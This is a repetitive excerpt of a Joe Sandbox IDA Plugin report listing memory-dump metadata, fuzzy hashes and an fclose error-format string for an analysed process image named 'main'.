                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
                                                      • Instruction ID: cfdf1f16a7ac7219ca7e532a12c07b09e938049fbbe791067380b435343c6f3c
                                                      • Opcode Fuzzy Hash: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
                                                      • Instruction Fuzzy Hash: 8AF05EE3F1861741F953BA48BC40FBD96522F453B9EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
                                                      • Instruction ID: cf50a52bd8daeb98cf876d2080b421ac7aa0fe7ef3829162d273264ce4e04c98
                                                      • Opcode Fuzzy Hash: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
                                                      • Instruction Fuzzy Hash: 9BF05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
                                                      • Instruction ID: cf50a52bd8daeb98cf876d2080b421ac7aa0fe7ef3829162d273264ce4e04c98
                                                      • Opcode Fuzzy Hash: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
                                                      • Instruction Fuzzy Hash: 9BF05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: c4566d302048c6188362bacd9c0eb47199ef46d1915068600f553c44cfa97314
                                                      • Instruction ID: 417db1311b06611ab463073e23fe6cd1eda3710d96cdcfd615cf93db6c1dba3e
                                                      • Opcode Fuzzy Hash: c4566d302048c6188362bacd9c0eb47199ef46d1915068600f553c44cfa97314
                                                      • Instruction Fuzzy Hash: 51F05EE3F1851341F953BB48BC40FBD96522F453A8EC905328D4A0F6D9AF3DA9C69320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
                                                      • Instruction ID: fe1f65c14c238ad030f72f028383c6bfad048c5a9a49d45c8c03a9ab6b157174
                                                      • Opcode Fuzzy Hash: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
                                                      • Instruction Fuzzy Hash: D4F05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
                                                      • Instruction ID: edea892eed85c3aa73837bb9288ca25a90f550bf0ef495c73371c9603cfb2e4f
                                                      • Opcode Fuzzy Hash: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
                                                      • Instruction Fuzzy Hash: 31F05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
                                                      • Instruction ID: df86253267b4352bd481ded57288674701e48d15a90376b4d0ac9bce17ea870b
                                                      • Opcode Fuzzy Hash: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
                                                      • Instruction Fuzzy Hash: 8BF03AE3E1861241E953BA48B841BB996522F453A8E890531CD4A0A6D9AF3DA8868220
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
                                                      • Instruction ID: cfdf1f16a7ac7219ca7e532a12c07b09e938049fbbe791067380b435343c6f3c
                                                      • Opcode Fuzzy Hash: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
                                                      • Instruction Fuzzy Hash: 8AF05EE3F1861741F953BA48BC40FBD96522F453B9EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
                                                      • Instruction ID: fe1f65c14c238ad030f72f028383c6bfad048c5a9a49d45c8c03a9ab6b157174
                                                      • Opcode Fuzzy Hash: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
                                                      • Instruction Fuzzy Hash: D4F05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
                                                      • Instruction ID: edea892eed85c3aa73837bb9288ca25a90f550bf0ef495c73371c9603cfb2e4f
                                                      • Opcode Fuzzy Hash: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
                                                      • Instruction Fuzzy Hash: 31F05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
                                                      • Instruction ID: df86253267b4352bd481ded57288674701e48d15a90376b4d0ac9bce17ea870b
                                                      • Opcode Fuzzy Hash: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
                                                      • Instruction Fuzzy Hash: 8BF03AE3E1861241E953BA48B841BB996522F453A8E890531CD4A0A6D9AF3DA8868220
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
                                                      • Instruction ID: cfdf1f16a7ac7219ca7e532a12c07b09e938049fbbe791067380b435343c6f3c
                                                      • Opcode Fuzzy Hash: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
                                                      • Instruction Fuzzy Hash: 8AF05EE3F1861741F953BA48BC40FBD96522F453B9EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
                                                      • Instruction ID: cf50a52bd8daeb98cf876d2080b421ac7aa0fe7ef3829162d273264ce4e04c98
                                                      • Opcode Fuzzy Hash: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
                                                      • Instruction Fuzzy Hash: 9BF05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
                                                      • Instruction ID: fe1f65c14c238ad030f72f028383c6bfad048c5a9a49d45c8c03a9ab6b157174
                                                      • Opcode Fuzzy Hash: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
                                                      • Instruction Fuzzy Hash: D4F05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
                                                      • Instruction ID: edea892eed85c3aa73837bb9288ca25a90f550bf0ef495c73371c9603cfb2e4f
                                                      • Opcode Fuzzy Hash: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
                                                      • Instruction Fuzzy Hash: 31F05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
                                                      • Instruction ID: df86253267b4352bd481ded57288674701e48d15a90376b4d0ac9bce17ea870b
                                                      • Opcode Fuzzy Hash: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
                                                      • Instruction Fuzzy Hash: 8BF03AE3E1861241E953BA48B841BB996522F453A8E890531CD4A0A6D9AF3DA8868220
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
                                                      • Instruction ID: cfdf1f16a7ac7219ca7e532a12c07b09e938049fbbe791067380b435343c6f3c
                                                      • Opcode Fuzzy Hash: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
                                                      • Instruction Fuzzy Hash: 8AF05EE3F1861741F953BA48BC40FBD96522F453B9EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
                                                      • Instruction ID: cf50a52bd8daeb98cf876d2080b421ac7aa0fe7ef3829162d273264ce4e04c98
                                                      • Opcode Fuzzy Hash: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
                                                      • Instruction Fuzzy Hash: 9BF05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
                                                      • Instruction ID: 18147115ffd0d6aa4155448b683403e5b05aa8e5a269ff54b94754b0fe82d52d
                                                      • Opcode Fuzzy Hash: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
                                                      • Instruction Fuzzy Hash: ACF05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA9C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
